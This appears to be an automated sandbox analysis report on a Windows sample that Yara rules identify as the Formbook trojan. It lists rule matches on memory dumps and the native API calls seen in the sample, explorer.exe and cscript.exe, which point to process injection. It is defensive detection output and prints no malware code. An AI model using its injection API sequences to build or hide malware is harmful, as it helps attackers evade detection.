              Source: Yara matchFile source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.3839526492.0000000010EC9000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
              Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: AB2hQJZ77ipdWem.exe PID: 7408, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: AB2hQJZ77ipdWem.exe PID: 7576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: cscript.exe PID: 7720, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041A40B NtReadFile,3_2_0041A40B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041A48A NtClose,3_2_0041A48A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102B60 NtClose,LdrInitializeThunk,3_2_01102B60
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01102BF0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102AD0 NtReadFile,LdrInitializeThunk,3_2_01102AD0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102D10 NtMapViewOfSection,LdrInitializeThunk,3_2_01102D10
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_01102D30
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102DD0 NtDelayExecution,LdrInitializeThunk,3_2_01102DD0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01102DF0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01102C70
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_01102CA0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102F30 NtCreateSection,LdrInitializeThunk,3_2_01102F30
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01102F90
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102FB0 NtResumeThread,LdrInitializeThunk,3_2_01102FB0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102FE0 NtCreateFile,LdrInitializeThunk,3_2_01102FE0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_01102E80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01102EA0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01104340 NtSetContextThread,3_2_01104340
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01104650 NtSuspendThread,3_2_01104650
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102B80 NtQueryInformationFile,3_2_01102B80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102BA0 NtEnumerateValueKey,3_2_01102BA0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102BE0 NtQueryValueKey,3_2_01102BE0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102AB0 NtWaitForSingleObject,3_2_01102AB0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102AF0 NtWriteFile,3_2_01102AF0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102D00 NtSetInformationFile,3_2_01102D00
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102DB0 NtEnumerateKey,3_2_01102DB0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102C00 NtQueryInformationProcess,3_2_01102C00
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102C60 NtCreateKey,3_2_01102C60
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102CC0 NtQueryVirtualMemory,3_2_01102CC0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102CF0 NtOpenProcess,3_2_01102CF0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102F60 NtCreateProcessEx,3_2_01102F60
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102FA0 NtQuerySection,3_2_01102FA0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102E30 NtWriteVirtualMemory,3_2_01102E30
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102EE0 NtQueueApcThread,3_2_01102EE0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01103010 NtOpenDirectoryObject,3_2_01103010
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01103090 NtSetValueKey,3_2_01103090
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011035C0 NtCreateMutant,3_2_011035C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011039B0 NtGetContextThread,3_2_011039B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01103D10 NtOpenProcessToken,3_2_01103D10
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01103D70 NtOpenThread,3_2_01103D70
              Source: C:\Windows\explorer.exeCode function: 4_2_10EB1232 NtCreateFile,4_2_10EB1232
              Source: C:\Windows\explorer.exeCode function: 4_2_10EB2E12 NtProtectVirtualMemory,4_2_10EB2E12
              Source: C:\Windows\explorer.exeCode function: 4_2_10EB2E0A NtProtectVirtualMemory,4_2_10EB2E0A
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04BD2CA0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04BD2C70
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2C60 NtCreateKey,LdrInitializeThunk,5_2_04BD2C60
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04BD2DF0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2DD0 NtDelayExecution,LdrInitializeThunk,5_2_04BD2DD0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04BD2D10
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04BD2EA0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2FE0 NtCreateFile,LdrInitializeThunk,5_2_04BD2FE0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2F30 NtCreateSection,LdrInitializeThunk,5_2_04BD2F30
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2AD0 NtReadFile,LdrInitializeThunk,5_2_04BD2AD0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04BD2BF0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04BD2BE0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2B60 NtClose,LdrInitializeThunk,5_2_04BD2B60
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD35C0 NtCreateMutant,LdrInitializeThunk,5_2_04BD35C0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD4650 NtSuspendThread,5_2_04BD4650
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD4340 NtSetContextThread,5_2_04BD4340
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2CF0 NtOpenProcess,5_2_04BD2CF0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2CC0 NtQueryVirtualMemory,5_2_04BD2CC0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2C00 NtQueryInformationProcess,5_2_04BD2C00
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2DB0 NtEnumerateKey,5_2_04BD2DB0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2D30 NtUnmapViewOfSection,5_2_04BD2D30
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2D00 NtSetInformationFile,5_2_04BD2D00
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2E80 NtReadVirtualMemory,5_2_04BD2E80
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2EE0 NtQueueApcThread,5_2_04BD2EE0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2E30 NtWriteVirtualMemory,5_2_04BD2E30
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2FB0 NtResumeThread,5_2_04BD2FB0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2FA0 NtQuerySection,5_2_04BD2FA0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2F90 NtProtectVirtualMemory,5_2_04BD2F90
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2F60 NtCreateProcessEx,5_2_04BD2F60
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2AB0 NtWaitForSingleObject,5_2_04BD2AB0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2AF0 NtWriteFile,5_2_04BD2AF0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2BA0 NtEnumerateValueKey,5_2_04BD2BA0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD2B80 NtQueryInformationFile,5_2_04BD2B80
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD3090 NtSetValueKey,5_2_04BD3090
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD3010 NtOpenDirectoryObject,5_2_04BD3010
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD3D10 NtOpenProcessToken,5_2_04BD3D10
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD3D70 NtOpenThread,5_2_04BD3D70
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD39B0 NtGetContextThread,5_2_04BD39B0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CA360 NtCreateFile,5_2_027CA360
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CA410 NtReadFile,5_2_027CA410
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CA490 NtClose,5_2_027CA490
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CA540 NtAllocateVirtualMemory,5_2_027CA540
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CA40B NtReadFile,5_2_027CA40B
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CA48A NtClose,5_2_027CA48A
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A4A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,5_2_04A4A036
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A49BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_04A49BAF
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A4A042 NtQueryInformationProcess,5_2_04A4A042
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A49BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_04A49BB2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 0_2_02F9D5B00_2_02F9D5B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_004010303_2_00401030
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041D8A33_2_0041D8A3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041D99C3_2_0041D99C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041E5583_2_0041E558
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_00402D903_2_00402D90
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041D5A63_2_0041D5A6
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_00409E4D3_2_00409E4D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_00409E503_2_00409E50
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_00402FB03_2_00402FB0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C01003_2_010C0100
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116A1183_2_0116A118
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011581583_2_01158158
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011901AA3_2_011901AA
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011841A23_2_011841A2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011881CC3_2_011881CC
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011620003_2_01162000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118A3523_2_0118A352
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DE3F03_2_010DE3F0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011903E63_2_011903E6
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011702743_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011502C03_2_011502C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D05353_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011905913_2_01190591
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011744203_2_01174420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011824463_2_01182446
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117E4F63_2_0117E4F6
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F47503_2_010F4750
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D07703_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CC7C03_2_010CC7C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EC6E03_2_010EC6E0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E69623_2_010E6962
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A03_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0119A9A63_2_0119A9A6
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D28403_2_010D2840
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DA8403_2_010DA840
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B68B83_2_010B68B8
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE8F03_2_010FE8F0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118AB403_2_0118AB40
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01186BD73_2_01186BD7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CEA803_2_010CEA80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116CD1F3_2_0116CD1F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DAD003_2_010DAD00
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E8DBF3_2_010E8DBF
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CADE03_2_010CADE0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0C003_2_010D0C00
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170CB53_2_01170CB5
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C0CF23_2_010C0CF2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01172F303_2_01172F30
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01112F283_2_01112F28
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F0F303_2_010F0F30
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01144F403_2_01144F40
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114EFA03_2_0114EFA0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C2FC83_2_010C2FC8
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DCFE03_2_010DCFE0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118EE263_2_0118EE26
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0E593_2_010D0E59
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118CE933_2_0118CE93
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E2E903_2_010E2E90
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118EEDB3_2_0118EEDB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0119B16B3_2_0119B16B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BF1723_2_010BF172
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0110516C3_2_0110516C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DB1B03_2_010DB1B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D70C03_2_010D70C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117F0CC3_2_0117F0CC
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011870E93_2_011870E9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118F0E03_2_0118F0E0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118132D3_2_0118132D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BD34C3_2_010BD34C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0111739A3_2_0111739A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D52A03_2_010D52A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EB2C03_2_010EB2C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011712ED3_2_011712ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011875713_2_01187571
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116D5B03_2_0116D5B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011995C33_2_011995C3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118F43F3_2_0118F43F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C14603_2_010C1460
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118F7B03_2_0118F7B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011156303_2_01115630
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011816CC3_2_011816CC
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011659103_2_01165910
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D99503_2_010D9950
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EB9503_2_010EB950
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113D8003_2_0113D800
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D38E03_2_010D38E0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118FB763_2_0118FB76
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EFB803_2_010EFB80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01145BF03_2_01145BF0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0110DBF93_2_0110DBF9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118FA493_2_0118FA49
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01187A463_2_01187A46
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01143A6C3_2_01143A6C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01115AA03_2_01115AA0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01171AA33_2_01171AA3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116DAAC3_2_0116DAAC
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117DAC63_2_0117DAC6
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01181D5A3_2_01181D5A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D3D403_2_010D3D40
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01187D733_2_01187D73
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EFDC03_2_010EFDC0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01149C323_2_01149C32
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118FCF23_2_0118FCF2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118FF093_2_0118FF09
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D1F923_2_010D1F92
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118FFB13_2_0118FFB1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01093FD23_2_01093FD2
